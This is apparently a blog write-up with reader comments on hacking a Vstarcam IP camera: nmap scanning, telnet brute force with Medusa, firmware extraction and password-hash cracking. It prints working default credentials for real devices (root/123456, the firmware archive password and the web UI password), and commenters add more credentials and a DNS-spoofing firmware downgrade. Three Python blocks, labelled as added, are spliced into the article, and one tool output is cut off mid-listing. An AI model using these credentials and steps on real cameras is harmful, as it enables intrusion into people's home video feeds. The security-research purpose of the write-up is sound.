1. Camera specifications
– Brand : Vstarcam
– Product name : C7824WIP HD indoor IP Camera
– Model : C7824WIP
– OS : Embedded Linux OS
– CPU :
> cat /proc/cpuinfo
Processor       : ARM926EJ-S rev 5 (v5l)
BogoMIPS        : 217.08
Features        : swp half thumb fastmult edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant     : 0x0
CPU part        : 0x926
CPU revision    : 5
Hardware        : hi3518
Revision        : 0000
Serial          : 0000000000000000
2. Security vulnerabilities
Achievements :
– Remotely take control of the camera (telnet)
– Find the web UI password
Methods :
– Bruteforce : success
– Firmware reverse engineering : success
– Form injection : success
3. Network services analysis
Scan all the active network services on the camera using Nmap :
> nmap -sV 192.168.1.16
Starting Nmap 6.47 ( http://nmap.org ) at 2016-01-21 20:59 SGT
Nmap scan report for 192.168.1.16
Host is up (0.014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
81/tcp open  http    GoAhead-Webs httpd
– 80/http : The web interface : Documented
– 23/telnet : Remote command line access : Undocumented
4. Telnet penetration test
4.1 Method 1 : Bruteforce
The password is cracked in a few seconds using Medusa. Hydra fails to crack the password.
> medusa -u root -P passwords.txt -h 192.168.1.16 -M telnet
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 111111 (1 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 11111111 (2 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 112233 (3 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 121212 (4 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123123 (5 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (6 of 370 complete)
ACCOUNT FOUND: [telnet] Host: 192.168.1.16 User: root Password: 123456 [SUCCESS]
The root password : 123456.
4.2 Method 2 : Reverse engineering
4.2.1 Tools
Binwalk
Binwalk is a firmware analysis tool designed for analyzing, reverse engineering and extracting data contained in firmware images.
The latest stable version of Binwalk (2.1.1) did not extract the firmware correctly, so I had to install version 2.0.0. The bug should be fixed in the next version.
Install Binwalk 2.0.0 :
> wget https://github.com/devttys0/binwalk/archive/v2.0.0.zip
> unzip v2.0.0.zip
> cd binwalk-2.0.0
> ./deps.sh
> ./configure
> make
> make install
4.2.2 Firmware reverse engineering
Firmware servers and download link
Sniffing the traffic between the Vstarcam firmware upgrade software and the Internet allows us to easily identify the servers and the protocol used to retrieve and upgrade the camera firmware.
Remote file : http://45.63.8.70/FM/system/firmware.txt
So we can download our firmware (45.63.8.70) using the following link : http://45.63.8.70/FM/system/CH-sys-48.53.64.67.zip
Firmware download and extraction
Create a working folder :
> mkdir firmware
> cd firmware
Download and extract the zipped firmware :
> wget http://45.63.8.70/FM/system/CH-sys-48.53.64.67.zip
> unzip CH-sys-48.53.64.67.zip
Binary header analysis :
> head -n1 CH-sys-48.53.64.67.bin | hexdump -C
00000000  77 77 77 2e 6f 62 6a 65  63 74 2d 63 61 6d 65 72  |www.object-camer|
00000010  61 2e 63 6f 6d 2e 62 79  2e 68 6f 6e 67 7a 78 2e  |a.com.by.hongzx.|
00000020  73 79 73 74 65 6d 2f 73  79 73 74 65 6d 2f 6c 69  |system/system/li|
00000030  62 2f 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |b/..............|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000060  6c 69 62 73 6e 73 5f 67  63 31 30 30 34 2e 73 6f  |libsns_gc1004.so|
00000070  2e 7a 69 70 00 00 00 00  00 00 00 00 00 00 00 00  |.zip............|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000000a0  e3 23 00 00 43 40 35 30  00 00 00 00 50 4b 03 04  |.#..C@50....PK..|
000000b0  14 00 00 00 08 00 fa 8b  5d 47 89 42 30 43 09 23  |........]G.B0C.#|
000000c0  00 00 93 4a 00 00 22 00  1c 00 73 79 73 74 65 6d  |...J.."...system|
000000d0  2f 73 79 73 74 65 6d 2f  6c 69 62 2f 6c 69 62 73  |/system/lib/libs|
000000e0  6e 73 5f 67 63 31 30 30  34 2e 73 6f 55 54 09 00  |ns_gc1004.soUT..|
000000f0  03 88 e7 31 56 88 e7 31  56 75 78 0b 00 01 04 ed  |...1V..1Vux.....|
00000100  03 00 00 04 ed 03 00 00  e5 7c 0b 78 53 55 d6 f6  |.........|.xSU..|
00000110  3e b9 b4 69 9a cb 69 cf  29 96 8b 92 0a           |>..i..i.)....|
We should be able to use Binwalk to extract the firmware :
> binwalk -Mer CH-sys-48.53.64.67.bin
Scan Time:     2016-01-20 01:02:57
Target File:   CH-sys-48.53.64.67.bin
MD5 Checksum:  58df9214226cfe46760215bfca0c496c
Signatures:    285
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
172           0xAC            Zip archive data, at least v2.0 to extract, compressed size: 8969, uncompressed size: 19091, name: "system/system/lib/libsns_gc1004.so"
9337          0x2479          End of Zip archive
9499          0x251B          Zip archive data, at least v2.0 to extract, compressed size: 7813, uncompressed size: 16341, name: "system/system/lib/libsns_ov9712_plus.so"
17518         0x446E          End of Zip archive
17680         0x4510          Zip archive data, at least v2.0 to extract, compressed size: 90121, uncompressed size: 353248, name: "system/system/lib/libOnvif.so"
107987        0x1A5D3         End of Zip archive
108149        0x1A675         Zip archive data, at least v2.0 to extract, compressed size: 43603, uncompressed size: 84480, name: "system/system/lib/libvoice_arm.so"
151946        0x2518A         End of Zip archive
152108        0x2522C         Zip archive data, at least v2.0 to extract, compressed size: 130, uncompressed size: 227, name: "system/init/ipcam.sh"
152406        0x25356         End of Zip archive
152568        0x253F8         Zip archive data, at least v2.0 to extract, compressed size: 402383, uncompressed size: 886168, name: "system/system/bin/encoder"
555129        0x87879         End of Zip archive
555291        0x8791B         Zip archive data, at least v2.0 to extract, compressed size: 35394, uncompressed size: 74200, name: "system/system/bin/wifidaemon"
590869        0x90415         End of Zip archive
591031        0x904B7         Zip archive data, at least v2.0 to extract, compressed size: 1852, uncompressed size: 9692, name: "system/system/bin/grade.sh"
593063        0x90CA7         End of Zip archive
593225        0x90D49         Zip archive data, at least v2.0 to extract, compressed size: 8704, uncompressed size: 20212, name: "system/system/bin/updata"
602105        0x92FF9         End of Zip archive
602267        0x9309B         Zip archive data, at least v2.0 to extract, compressed size: 1874, uncompressed size: 4522, name: "system/system/bin/gpio_aplink.ko"
604333        0x938AD         End of Zip archive
604495        0x9394F         Zip archive data, at least v2.0 to extract, compressed size: 7241, uncompressed size: 16802, name: "system/system/bin/motogpio.ko"
611922        0x95652         End of Zip archive
612084        0x956F4         Zip archive data, at least v1.0 to extract, compressed size: 8, uncompressed size: 8, name: "system/system/bin/fwversion.bin"
612282        0x957BA         End of Zip archive
612444        0x9585C         Zip archive data, at least v1.0 to extract, compressed size: 9, uncompressed size: 9, name: "system/system/bin/sysversion.txt"
612645        0x95925         End of Zip archive
Using tree to see the files available :
> tree _CH-sys-48.53.64.67.bin.extracted/
_CH-sys-48.53.64.67.bin.extracted/
└── system
    ├── init
    │   └── ipcam.sh
    └── system
        ├── bin
        │   ├── encoder
        │   ├── fwversion.bin
        │   ├── gpio_aplink.ko
        │   ├── grade.sh
        │   ├── motogpio.ko
        │   ├── sysversion.txt
        │   ├── updata
        │   └── wifidaemon
        └── lib
            ├── libOnvif.so
            ├── libsns_gc1004.so
            ├── libsns_ov9712_plus.so
            └── libvoice_arm.so
5 directories, 13 files
Done !
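The layout that the hexdump and the Binwalk offsets imply, written out as a parser. This is an added example, not code from the original article or from the vendor: the field layout (a 32-byte magic, then per packed file a 64-byte directory, a 64-byte name, a little-endian length and 8 uninterpreted bytes before the Zip data) is inferred from the output above, and `parse_container`, `build_sample` and the sample contents are constructed for illustration.

```python
import io
import struct
import zipfile
from collections import namedtuple
from pathlib import PurePosixPath

# Inferred layout (an assumption, not vendor documentation):
#   0x00  32-byte magic, once per image
#   then, per packed file:
#     64-byte directory and 64-byte file name, both NUL padded
#     uint32 little-endian length of the Zip payload
#     8 bytes whose meaning the page does not establish
#     the Zip payload itself
MAGIC = b"www.object-camera.com.by.hongzx."
RECORD_HEADER = struct.Struct("<64s64sI8s")  # 140 bytes
ZIP_LOCAL_MAGIC = b"PK\x03\x04"

Record = namedtuple(
    "Record", "directory name payload_offset payload_length members warnings")


def _text(field):
    """Decode a NUL-padded header field."""
    return field.split(b"\x00", 1)[0].decode("ascii", "replace")


def _check_members(directory, name, payload):
    """List the archive members and flag anything unsafe to extract blindly."""
    warnings = []
    with zipfile.ZipFile(io.BytesIO(payload)) as zf:
        members = zf.namelist()
    for member in members:
        path = PurePosixPath(member)
        if path.is_absolute() or ".." in path.parts:
            warnings.append(f"unsafe member path: {member}")
    stem = name[:-4] if name.endswith(".zip") else name
    if directory + stem not in members:
        warnings.append(f"header names {directory + stem!r}, archive holds {members!r}")
    return members, warnings


def parse_container(blob):
    """Walk every record of the image and return a list of Record tuples."""
    if not blob.startswith(MAGIC):
        raise ValueError("missing container magic")
    records, pos = [], len(MAGIC)
    while pos < len(blob):
        if len(blob) - pos < RECORD_HEADER.size:
            raise ValueError(f"truncated record header at offset {pos:#x}")
        raw_dir, raw_name, length, _unknown = RECORD_HEADER.unpack_from(blob, pos)
        start = pos + RECORD_HEADER.size
        payload = blob[start:start + length]
        if len(payload) != length:
            raise ValueError(f"payload at {start:#x} overruns the file")
        if not payload.startswith(ZIP_LOCAL_MAGIC):
            raise ValueError(f"no Zip signature at {start:#x}")
        directory, name = _text(raw_dir), _text(raw_name)
        members, warnings = _check_members(directory, name, payload)
        records.append(Record(directory, name, start, length, members, warnings))
        pos = start + length
    return records


def build_sample():
    """Constructed two-record image; file contents are made up."""
    files = [
        ("system/init/", "ipcam.sh", b"#!/bin/sh\n"),
        ("system/system/bin/", "sysversion.txt", b"0.0.0.0\n"),
    ]
    blob = bytearray(MAGIC)
    for directory, name, data in files:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr(directory + name, data)
        payload = buf.getvalue()
        # The 8 trailing header bytes are copied from the hexdump as-is.
        blob += RECORD_HEADER.pack(directory.encode(), (name + ".zip").encode(),
                                   len(payload), b"C@50\x00\x00\x00\x00")
        blob += payload
    return bytes(blob)


if __name__ == "__main__":
    for rec in parse_container(build_sample()):
        print(f"{rec.payload_offset:#08x} {rec.payload_length:6d} "
              f"{rec.directory}{rec.name} -> {rec.members} {rec.warnings}")
```

If the inferred layout holds for the real image, the first record's `payload_offset` should equal the 172 (0xAC) that Binwalk reports for the first Zip signature.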
Firmware analysis and password retrieval
Looking for the files containing the “passwd” string :
> grep -r "passwd" .
Binary file ./system/system/bin/wifidaemon matches
Binary file ./system/system/bin/encoder matches
Then check these files for the password.
– wifidaemon :
> strings system/system/bin/wifidaemon | grep -A 1 -B 1 passwd
iRet %d pkey:%s keyvalue:%s
/etc/passwd
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
– encoder :
> strings system/system/bin/encoder | grep -A 1 -B 1 passwd
factory_user
factory_passwd
factory_alarmserver
--
alarmuser
alarmpasswd
alarmdeviceid
--
===websLaunchCgiProc===
/etc/passwd
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
--
SET_PARAMETER
check_user_passwd right
check_user_passwd erro
Unknown RTSP server state[%d]
So the hashed password for the root user is : LSiuY7pOmZG2s. This is a hash, not the password itself, so you can’t log in with it directly. We need to crack it first :
> echo "root:LSiuY7pOmZG2s" > password.txt
> john password.txt
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
123456           (root)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 17680  trying: 12345 - biteme
Use the "--show" option to display all of the cracked passwords reliably
The root password : 123456.
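The `strings | grep` check above, generalized into an audit pass that flags passwd-style lines baked into firmware binaries and names the hash scheme of each. This is an added example, not code from the original article; the regular expression, the severity labels and every sample byte except the root line quoted above are assumptions.

```python
import os
import re
from collections import namedtuple

Finding = namedtuple("Finding", "source offset user uid shell scheme severity")

# passwd(5) layout: name:password:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    rb"(?<![A-Za-z0-9_-])([a-z_][a-z0-9_-]{0,31}):([^:\s\x00]{1,128}):"
    rb"(\d{1,10}):(\d{1,10}):([^:\n\x00]*):(/[^:\s\x00]*):(/[^:\s\x00]*)"
)

# (prefix, scheme, treated as weak in this audit)
MODULAR_PREFIXES = (
    ("$1$", "MD5-crypt", True),
    ("$2", "bcrypt", False),
    ("$5$", "SHA-256-crypt", False),
    ("$6$", "SHA-512-crypt", False),
    ("$y$", "yescrypt", False),
)
DES_CRYPT = re.compile(r"[./0-9A-Za-z]{13}")
NO_LOGIN_SHELLS = ("nologin", "false")


def classify_hash(field):
    """Return (scheme, is_weak) for the password field of a passwd line."""
    if field in ("x", "*") or field.startswith("!"):
        return "none (shadowed or locked)", False
    for prefix, scheme, weak in MODULAR_PREFIXES:
        if field.startswith(prefix):
            return scheme, weak
    if DES_CRYPT.fullmatch(field):
        # 2-character salt + 11 hash characters; the algorithm only uses
        # the first 8 characters of the password.
        return "traditional DES crypt", True
    return "unrecognised", False


def scan_blob(data, source):
    """Find passwd-style lines in raw bytes and rate each one."""
    findings = []
    for m in PASSWD_LINE.finditer(data):
        user, pw, uid, _gid, _gecos, _home, shell = (
            g.decode("ascii", "replace") for g in m.groups())
        scheme, weak = classify_hash(pw)
        interactive = not shell.endswith(NO_LOGIN_SHELLS)
        if scheme.startswith("none"):
            severity = "info"      # no credential material in the binary
        elif weak and interactive:
            severity = "high"      # weak hash on an account that can log in
        else:
            severity = "medium"    # a hash shipped in firmware is still fixed
        findings.append(
            Finding(source, m.start(), user, int(uid), shell, scheme, severity))
    return findings


def scan_tree(root):
    """Run scan_blob over every file below an extracted firmware directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                findings += scan_blob(fh.read(), path)
    return findings


# Constructed sample: the root line is the one the page found in wifidaemon
# and encoder; the surrounding bytes and the "nobody" line are made up.
SAMPLE = (
    b"\x7fELF\x01\x01\x01\x00iRet %d pkey:%s keyvalue:%s\x00/etc/passwd\x00"
    b"root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh\x00"
    b"nobody:x:99:99:Nobody:/:/sbin/nologin\x00"
)

if __name__ == "__main__":
    for f in scan_blob(SAMPLE, "sample (constructed)"):
        print(f"[{f.severity}] {f.source} @ {f.offset:#x}: "
              f"{f.user} uid={f.uid} shell={f.shell} scheme={f.scheme}")
```

Pointing `scan_tree` at the extracted firmware directory gives a vendor or integrator a release gate: any "high" finding means a fixed, weakly hashed login credential ships in the image.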
4.2.3 WebUI reverse engineering
Now that you have root access, you could go online and retrieve the whole WebUI directly from the device. However, we’ll show the reverse engineering approach here.
Firmware servers and download link
Sniffing the traffic between the Vstarcam firmware upgrade software and the Internet allows us to easily identify the servers and the protocol used to retrieve and upgrade the camera WebUI.
Remote file: http://45.63.8.70/FM/vstarcam/firmware.txt
So we can download the WebUI EN53.8.1.13 using the following link : http://45.63.8.70/FM/vstarcam/CH-app-CH53.8.1.13_VSTARCAM.zip
WebUI download and extraction
Create a working folder :
> mkdir webui
> cd webui
Download and extract the zipped firmware :
> wget http://45.63.8.70/FM/vstarcam/CH-app-CH53.8.1.13_VSTARCAM.zip
> unzip CH-app-CH53.8.1.13_VSTARCAM.zip
Now we can use Binwalk to extract the .bin firmware :
> binwalk -Mer CH-app-EN53.8.1.13_VSTARCAM.bin
Scan Time:     2016-01-21 01:29:23
Target File:   CH-app-EN53.8.1.13_VSTARCAM.bin
MD5 Checksum:  41965a8a4aea9293a0b111e7bf004fcc
Signatures:    285
v1.0 to extract, compressed size: 14, uncompressed size: 2, name: "www/test.txt" 933714 0xE3F52 Zip encrypted archive data, at least v2.0 to extract, compressed size: 516, uncompressed size: 1441, name: "www/test_ftp.htm" 934292 0xE4194 Zip encrypted archive data, at least v2.0 to extract, compressed size: 524, uncompressed size: 1462, name: "www/test_mail.htm" 934879 0xE43DF Zip encrypted archive data, at least v2.0 to extract, compressed size: 145, uncompressed size: 188, name: "www/unauth.htm" 935084 0xE44AC Zip encrypted archive data, at least v2.0 to extract, compressed size: 826, uncompressed size: 2513, name: "www/upgrade.htm" 935971 0xE4823 Zip encrypted archive data, at least v2.0 to extract, compressed size: 841, uncompressed size: 2009, name: "www/upnp.htm" 936870 0xE4BA6 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1355, uncompressed size: 5074, name: "www/user.htm" 938283 0xE512B Zip encrypted archive data, at least v2.0 to extract, compressed size: 92024, uncompressed size: 102860, name: "www/vfaile.wav" 1030367 0xFB8DF Zip encrypted archive data, at least v1.0 to extract, compressed size: 12, name: "www/video.cab" 1030438 0xFB926 Zip encrypted archive data, at least v1.0 to extract, compressed size: 12, name: "www/video.exe" 1030509 0xFB96D Zip encrypted archive data, at least v2.0 to extract, compressed size: 1504, uncompressed size: 8824, name: "www/video.htm" 1032072 0xFBF88 Zip encrypted archive data, at least v2.0 to extract, compressed size: 92722, uncompressed size: 103604, name: "www/vwificonfig.wav" 1124859 0x1129FB Zip encrypted archive data, at least v2.0 to extract, compressed size: 94398, uncompressed size: 102768, name: "www/wificonfig.wav" 1219321 0x129AF9 Zip encrypted archive data, at least v2.0 to extract, compressed size: 2748, uncompressed size: 11609, name: "www/wireless.htm" 1235916 0x12DBCC End of Zip archive
The zip files are password protected.
Another way to check :
> unzip CH-app-EN53.8.1.13_VSTARCAM.bin
Archive: CH-app-EN53.8.1.13_VSTARCAM.bin
warning [CH-app-EN53.8.1.13_VSTARCAM.bin]: 36 extra bytes at beginning or within zipfile
(attempting to process anyway)
[CH-app-EN53.8.1.13_VSTARCAM.bin] www/ password:
The easiest way is to go back to the firmware folder and look for the unzipping password :
> cd ../firmware/_CH-sys-48.53.64.67.bin.extracted/
And use the same method that we used to find the root password. Look for any unzip command in files :
> grep -r "unzip" .
Binary file ./system/system/bin/updata matches
Binary file ./system/system/bin/wifidaemon matches
Binary file ./system/system/bin/encoder matches
And check in the updata file for the password :
> strings system/system/bin/updata | grep -A 1 -B 1 unzip
cp /tmp/network-b.ini /system/www/network-b.ini
unzip www is start...
/system/system/bin/unzip1 -o -P vstarcam!@#$% /tmp/www.zip -d /system > /tmp/app.txt
unzip www is end
rm /tmp/www.zip
Unzipping password : vstarcam!@#$% (better than 123456 by the way !).
Let’s go back to WebUI unzipping :
> cd ../../webui/
And use the previous password to unzip the file :
> unzip CH-app-EN53.8.1.13_VSTARCAM.bin
Archive: CH-app-EN53.8.1.13_VSTARCAM.bin
warning [CH-app-EN53.8.1.13_VSTARCAM.bin]: 36 extra bytes at beginning or within zipfile
(attempting to process anyway)
[CH-app-EN53.8.1.13_VSTARCAM.bin] www/ password:
Done !
4.3 Method 3 : Injection
Thanks to this article, we know that the system interprets the FTP user field, so proceed as follows :
Save and proceed to a “test”. Then monitor the FTP server logs :
FTP session opened. USER root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh: no such user found from 192.168.1.16 [192.168.1.16] to ::ffff:192.168.1.15:21 2FTP session closed.
So the hashed password for the root user is : LSiuY7pOmZG2s. As mentioned before, it is easy to crack :
> echo "root:LSiuY7pOmZG2s" > password.txt
> john password.txt
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
123456 (root)
guesses: 1 time: 0:00:00:00 100% (2) c/s: 17680 trying: 12345 - biteme
Use the "--show" option to display all of the cracked passwords reliably
5. Web interface penetration test
Initiate a telnet connection on the camera using the credentials found earlier.
Then it’s easy to find the web interface password :
> find -name "*.cgi"
./system/param/login.cgi
> strings system/param/login.cgi | grep -A 1 -B 1 pass
var loginuser="admin";
var loginpass="erocgfhruehgi3ureozkfx";
var pri=255;
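The archive password in updata, the DES crypt hash for root and the web UI password in login.cgi are all plaintext strings inside the firmware. The Python scanner below is an added example, not part of the original post, showing how a firmware audit can flag all three before an image ships; the rule names, function names and sample blobs are assumptions, with the samples constructed from the strings quoted in this article.

```python
import os
import re
from typing import Iterator, List, NamedTuple

class Finding(NamedTuple):
    path: str
    rule: str
    value: str

# Runs of 4+ printable ASCII bytes, the same idea as strings(1).
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")

# Hypothetical rule names; group 1 of each pattern is the embedded secret.
RULES = {
    # zip/unzip called with the archive password on the command line
    "zip-password-arg": re.compile(r"zip\w*\s+(?:-\w+\s+)*-P\s+(\S+)"),
    # passwd-style entry with a 13-character traditional DES crypt hash
    "des-crypt-passwd": re.compile(r"^\w[\w-]*:([./0-9A-Za-z]{13}):\d+:\d+:"),
    # JavaScript variable that holds a password literal
    "js-password-literal": re.compile(r'var\s+\w*pass\w*\s*=\s*"([^"]+)"'),
}

def scan_blob(path: str, blob: bytes) -> Iterator[Finding]:
    """Yield a Finding for every printable string in blob that matches a rule."""
    for run in PRINTABLE.finditer(blob):
        text = run.group().decode("ascii")
        for rule, pattern in RULES.items():
            match = pattern.search(text)
            if match:
                yield Finding(path, rule, match.group(1))

def scan_tree(root: str) -> List[Finding]:
    """Scan every regular file under an extracted firmware directory."""
    findings: List[Finding] = []
    for folder, _dirs, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(folder, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # extracted images often contain dangling symlinks
            with open(full, "rb") as handle:
                rel = os.path.relpath(full, root)
                findings.extend(scan_blob(rel, handle.read()))
    return findings

# Constructed sample blobs built from the strings quoted in the article.
SAMPLE_UPDATA = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"unzip www is start...\x00"
    + b"/system/system/bin/unzip1 -o -P vstarcam!@#$% /tmp/www.zip -d /system\x00"
    + b"unzip www is end\x00"
    + b"root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh\x00"
)
SAMPLE_LOGIN_CGI = (
    b'var loginuser="admin";\nvar loginpass="erocgfhruehgi3ureozkfx";\nvar pri=255;\n'
)

if __name__ == "__main__":
    for sample_path, blob in (("system/system/bin/updata", SAMPLE_UPDATA),
                              ("system/param/login.cgi", SAMPLE_LOGIN_CGI)):
        for finding in scan_blob(sample_path, blob):
            print(f"{finding.path}: {finding.rule}: {finding.value}")
```

Pointing scan_tree() at the directory produced by the firmware extraction gives the same findings per file; each hit is a credential shared by every device running that image.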
6. Links
– http://catdevzero.blogspot.sg/2015/02/experiments-with-ip-camera-part-1.html
– http://liken.otsoa.net/blog/?x=entry:entry140322-183809
– http://jumpespjump.blogspot.co.uk/2015/09/how-i-hacked-my-ip-camera-and-found.html
– https://www.pentestpartners.com/blog/hacking-the-ip-camera-part-1/
Very nice, on my camera the password is an empty string.
There is an interesting line.
It would appear that the password is generated randomly by a program or function called CreateTelnetPasswd.
How would you recommend getting telnet access?
===websLaunchCgiProc===
/etc/passwd
vstarcam2015:%s:0:0:Administrator:/:/bin/sh
/etc/group
root:x:0:admin
CreateTelnetPasswd
WebReadParam
/
…skipping
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
Never mind my last post, the FTP thing worked. The password might take a while to crack tho.
I wish these cameras were Open-Source, they could probably sell more units if they did that.
BTW, for anyone else reading this the password was 20150602 for firmware 48.53.72.74. The username was vstarcam2015
Thanks for the great article on reverse engineering.
Thank you very much. vstarcam2015/20150602 worked for me.
yep worked for me. vstarcam2015:QwXG/I3Tws752
the telnet password for my
VSTARCAM T6835WIP PnP IP Network Camera
was 2011vsta
Cheers SilverBird and OP. I'm in 🙂
Hi guys,
Great article, I learned a lot from it.
I have this cam and I want to use it in a secure way. When I disable traffic to internet for this device on my router and reboot the cam, I can’t connect anymore via the Android application (eye4). Even telnet and nmap don’t show life.
I tried to find another application that could connect internally but none of them succeeds to show any frame.
Someone knows about some good app?
10x
Daniel
Daniel,
I would not be surprised that the Eye4 app is not working anymore after that.
However it is unlikely that telnet and HTTP no longer work. Did you try to ping the cam ?
If NMAP is not showing up anything, any client will be able to connect.
really interesting. thanks very much for this “howto”. i am asking myself how you figured out the right firmware-file from
Remote file : http://45.63.8.70/FM/system/firmware.txt
there are so many. i have the CAM C7837W. what firmware-file do i need?
thanks in advance
torsten
Hi,
Unfortunately I don’t have the camera anymore but if I remember correctly, this should be mentioned somewhere on the Web UI (maintenance, system or something similar).
Ronan
torsten, did you ever find the firmware for C7837?
Very interesting article, I was going to buy this camera as baby monitor.
Just a couple of questions: would be a little less insecure changing the root password to something a bit harder to brute-force than 123456?
Furthermore what if I don’t forward the telnet and ftp port?
Thanks!
Not really, it’s reset when the camera boots up, and for me the biggest issue is to have a videostream going on unknown servers…
But having this camera running on a local network without internet connection should be ok…
It seems they have addressed the security vulnerabilities. Today I updated the firmware and NMAP didn’t show any open ports…
Hi,
Good to know ! Maybe they didn’t fix the injection breach, and there is still a way to activate Telnet by this way.
Ronan
You can easily spoof the DNS for the update request, whereby pointing it to an IP holding older firmware. I have successfully got telnet working, however the web interface has been removed, it seems.